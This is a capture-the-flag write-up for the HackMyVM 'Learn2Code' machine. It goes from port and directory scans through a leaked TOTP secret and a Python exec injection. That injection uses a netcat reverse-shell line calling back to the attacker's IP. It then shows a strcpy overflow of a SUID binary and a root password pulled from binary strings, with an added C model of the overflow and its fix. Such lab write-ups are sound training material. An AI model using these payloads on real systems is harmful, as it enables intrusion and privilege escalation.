HackmyVM-Learn2Code

  1. Reconnaissance
  2. Port 80
  3. Privilege escalation
  4. Privilege escalation to root

Reconnaissance

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:80:63:b8 PCS Systemtechnik GmbH
192.168.31.178 08:00:27:7c:36:6c PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.436 seconds (105.09 hosts/sec). 3 responded
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.178 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.178:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 01:29 EDT
Initiating ARP Ping Scan at 01:29
Scanning 192.168.31.178 [1 port]
Completed ARP Ping Scan at 01:29, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.31.178 [1 port]
Discovered open port 80/tcp on 192.168.31.178
Completed SYN Stealth Scan at 01:29, 0.02s elapsed (1 total ports)
Nmap scan report for 192.168.31.178
Host is up, received arp-response (0.00031s latency).
Scanned at 2025-05-08 01:29:48 EDT for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:7C:36:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Only port 80 is open.

Port 80

Scan for directories:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.178/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.178/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 1161]
/includes (Status: 301) [Size: 319] [--> http://192.168.31.178/includes/]
/todo.txt (Status: 200) [Size: 51]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]

todo.txt:


******* Remember to delete the bak files!! *******

Directory listing is enabled on includes, and it exposes access.php.bak:

<?php
require_once 'GoogleAuthenticator.php';
$ga = new PHPGangsta_GoogleAuthenticator();
$secret = "S4I22IG3KHZIGQCJ";

if ($_POST['action'] == 'check_code') {
    $code = $_POST['code'];
    $result = $ga->verifyCode($secret, $code, 1);

    if ($result) {
        include('coder.php');
    } else {
        echo "wrong";
    }
}
?>

The code is verified by GoogleAuthenticator.php, i.e. it is a TOTP code. Google Authenticator is a TOTP app: entering this secret into it produces valid codes. After submitting a code you reach a page that accepts Python code and runs it, and the error messages reveal that it is executed with exec.

__import__('os').system('nc -e /bin/bash 192.168.31.129 4444')

This gives us a reverse shell.

Privilege escalation

www-data@Learn2Code:/var/www/html/includes/php$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/MakeMeLearner
/usr/bin/chfn

MakeMeLearner looks suspicious; download it and open it in IDA.

int __fastcall main(int argc, const char **argv, const char **envp)
{
    char dest[76]; // [rsp+10h] [rbp-50h] BYREF
    int v5; // [rsp+5Ch] [rbp-4h]

    if ( argc == 1 )
        errx(1, "please specify an argument\n", envp);
    printf("Change the 'modified' variable value to '0x61626364' to be a learner");
    v5 = 0;
    strcpy(dest, argv[1]);
    if ( v5 == 1633837924 )
    {
        setuid(0x3E8u);
        setgid(0x3E8u);
        system("/bin/bash");
    }
    else
    {
        printf("Try again, you got 0x%08x\n", v5);
    }
    return 0;
}

The strcpy allows a stack overflow: dest is 76 bytes, so supplying 77 'a's shows

Change the 'modified' variable value to '0x61626364' to be a learnerTry again, you got 0x00000061

The overflow has reached v5. It wants 0x61626364, so we send "dcba", because the target is little-endian:

Change the 'modified' variable value to '0x61626364' to be a learnerTry again, you got 0x00000061
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
learner@Learn2Code:/var/www/html/includes/php$

That gets us the user.
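As an added example (not part of the write-up or the challenge binary), a C model of the MakeMeLearner frame: it reproduces why 77 'a's give 0x00000061 and 76 'a's plus "dcba" give 0x61626364 without performing a real overflow, and shows the bounds-checked copy that would have closed the bug. DEST_SIZE, MAGIC, le_u32, modified_after_strcpy, copy_arg_checked and arg_fits are assumed names.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of the decompiled frame: 'dest' is 76 bytes and the int
 * compared against 0x61626364 sits immediately after it. */
#define DEST_SIZE 76
#define MAGIC     0x61626364u

/* Little-endian decode, as the x86-64 target reads the 4 bytes after dest;
 * "dcba" decodes to 0x61626364, which is why the input is written reversed. */
uint32_t le_u32(const unsigned char *b)
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Models what strcpy(dest, arg) leaves in the adjacent int without running a
 * real overflow: strcpy writes strlen(arg)+1 bytes (NUL included), so the
 * int's bytes come from arg[76..79] where those exist; the NUL and the
 * untouched original value (v5 = 0) are both zero. */
uint32_t modified_after_strcpy(const char *arg)
{
    unsigned char tail[4] = {0, 0, 0, 0};   /* v5 = 0 before the copy */
    size_t len = strlen(arg);
    for (size_t i = 0; i < 4 && DEST_SIZE + i < len; i++)
        tail[i] = (unsigned char)arg[DEST_SIZE + i];
    return le_u32(tail);
}

/* Hardened replacement for the unchecked strcpy: reject anything that does
 * not fit together with its NUL, so the copy can never reach 'modified'.
 * Returns 0 on success, -1 if the argument was rejected. */
int copy_arg_checked(char *dest, size_t dest_size, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= dest_size)
        return -1;
    memcpy(dest, arg, len + 1);
    return 0;
}

/* 1 if a DEST_SIZE buffer accepts arg under the hardened copy, else 0. */
int arg_fits(const char *arg)
{
    char dest[DEST_SIZE];
    return copy_arg_checked(dest, sizeof dest, arg) == 0;
}
```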

Privilege escalation to root

learner's home directory contains MySecretPasswordVault; download it and take a look.

; Attributes: bp-based frame

; int __fastcall main(int argc, const char **argv, const char **envp)
public main
main proc near

var_18= qword ptr -18h
var_10= qword ptr -10h
var_8= qword ptr -8

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 20h
lea rax, aNoi98ho ; "NOI98hO"
mov [rbp+var_8], rax
lea rax, aIhj ; "Ihj"
mov [rbp+var_10], rax
lea rax, aJj ; ")(Jj"
mov [rbp+var_18], rax
lea rdi, s ; "If you are a learner, i'm sure you know"...
call _puts
mov eax, 0
leave
retn
; } // starts at 1135
main endp

NOI98hOIhj)(Jj

The three string fragments concatenated in order are the root password.
